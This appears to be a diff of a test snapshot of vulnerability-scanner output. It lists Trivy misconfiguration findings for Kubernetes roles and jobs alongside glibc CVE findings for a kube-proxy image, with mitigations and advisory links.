- "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", - "id": "AVD-KSV-0110", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://avd.aquasec.com/misconfig/avd-ksv-0110", - ], - }, - "category": "Misconfiguration", - "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", - "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", - "mitigation": "Remove sensitive content from configMap data value", - "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV044", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv044", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on wildcard resource", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", - "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv044", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202006-04", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": 